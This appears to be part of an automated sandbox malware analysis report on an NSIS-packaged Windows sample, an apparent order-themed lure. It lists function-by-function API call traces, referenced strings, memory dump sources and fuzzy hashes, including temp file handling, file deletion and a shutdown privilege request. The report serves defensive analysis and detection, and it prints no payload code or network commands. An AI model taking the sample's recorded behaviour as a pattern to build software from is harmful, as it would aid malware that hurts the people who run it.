lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,00437800,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(00437800,000003FB), ref: 0040392D
lstrcatW.KERNEL32(00437800,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp), ref: 0040394D
lstrcatW.KERNEL32(00437800,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,00437800), ref: 0040396E
DeleteFileW.KERNEL32(00437000), ref: 00403982
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,?), ref: 00403A69
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,?), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNEL32(?,00000000,00403633,00437800,00437800,00437800,00437800,00437800,00403923), ref: 00405C1C

lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403A83
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(00437800,00437800), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32(00438800,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

UXTHEME, xrefs: 0040372E, 00403733, 00403739
SeShutdownPrivilege, xrefs: 00403BB4
Error launching installer, xrefs: 00403A12
.tmp, xrefs: 00403A7D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
NSIS Error, xrefs: 004037A1
~nsu, xrefs: 00403A61
TMP, xrefs: 00403969
TEMP, xrefs: 00403961
\Temp, xrefs: 00403933
Low, xrefs: 0040394F

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-334447862
Opcode ID: deb3a00d143b6aa78bb2b1a2e346eb90566b5d977a12c27eefb7c9e462199e19
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: deb3a00d143b6aa78bb2b1a2e346eb90566b5d977a12c27eefb7c9e462199e19
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,75923420,75922EE0,00000000), ref: 00405D9D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,75923420,75922EE0,00000000), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

PWB, xrefs: 00405DCD
\*.*, xrefs: 00405DDF
., xrefs: 00405E2F
., xrefs: 00405E43

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PWB$\*.*
API String ID: 2035342205-2468439962
Opcode ID: 940861fcee61791cebd47972434d631a122b2fd3f1b0f9519d925d107bfe0621
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: 940861fcee61791cebd47972434d631a122b2fd3f1b0f9519d925d107bfe0621
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Function 357C4FE0 Relevance: 14.2, Strings: 11, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C50EB
$]q, xrefs: 357C511C
PD-5, xrefs: 357C5168
$]q, xrefs: 357C54A8
$]q, xrefs: 357C555D
$]q, xrefs: 357C5547
$]q, xrefs: 357C5569
$]q, xrefs: 357C54B4
$]q, xrefs: 357C5553
$]q, xrefs: 357C50F7
$]q, xrefs: 357C5128

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PD-5$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2932928583
Opcode ID: 41676061bdbea65a8194dae48a9ff8af271ffbed5aca85fc0ac8e3c1c7644b9c
Instruction ID: 254701f644aafa3230cbe81ae47f155bbf379ba7e4bb85f41878cb22cb77c9bb
Opcode Fuzzy Hash: 41676061bdbea65a8194dae48a9ff8af271ffbed5aca85fc0ac8e3c1c7644b9c
Instruction Fuzzy Hash: 0D125E30A002198FDB14DF69C994A9DB7F3BF88344F2085A9D40AAB355EB75DD82CF80

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32(?,?), ref: 004058B3
GetSystemMetrics.USER32(00000002), ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32(00000000), ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

{, xrefs: 00405A6F
H7B, xrefs: 00405AF7

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

M, xrefs: 004051E5
, xrefs: 004055FF
N, xrefs: 004052C6

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
EnableWindow.USER32(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32(00000000), ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H7B
API String ID: 1860320154-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Function 00403D17 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420,00437800,?,00000000,?), ref: 00403D98
lstrlenW.KERNEL32(00428200,?,?,?,00428200,00000000,00435800,00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420), ref: 00403E18
lstrcmpiW.KERNEL32(004281F8,.exe,00428200,?,?,?,00428200,00000000,00435800,00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(00428200,?,00000000,?), ref: 00403E36
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32(00429200), ref: 00403EBC
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
RegisterClassW.USER32(00429200), ref: 00403F81
DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
RichEd32, xrefs: 00403F53
.DEFAULT\Control Panel\International, xrefs: 00403D83
_Nb, xrefs: 00403E9B, 00403F03
RichEd20, xrefs: 00403F45
RichEdit, xrefs: 00403F72
.exe, xrefs: 00403E25
RichEdit20W, xrefs: 00403F63, 00403F69
H7B, xrefs: 00403D43

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3472120104
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Function 00404783 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

N, xrefs: 0040491F

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,00438800,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

mB, xrefs: 004062D7
%ls=%ls, xrefs: 00406323
uB, xrefs: 00406304
uB, xrefs: 0040630B
[Rename], xrefs: 00406397, 004063A9

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 4614d034e2a0d51c3182c1dc66dc3f17e33e4efb28174d4dcb2b9d1eb40c95ca
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 4614d034e2a0d51c3182c1dc66dc3f17e33e4efb28174d4dcb2b9d1eb40c95ca
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
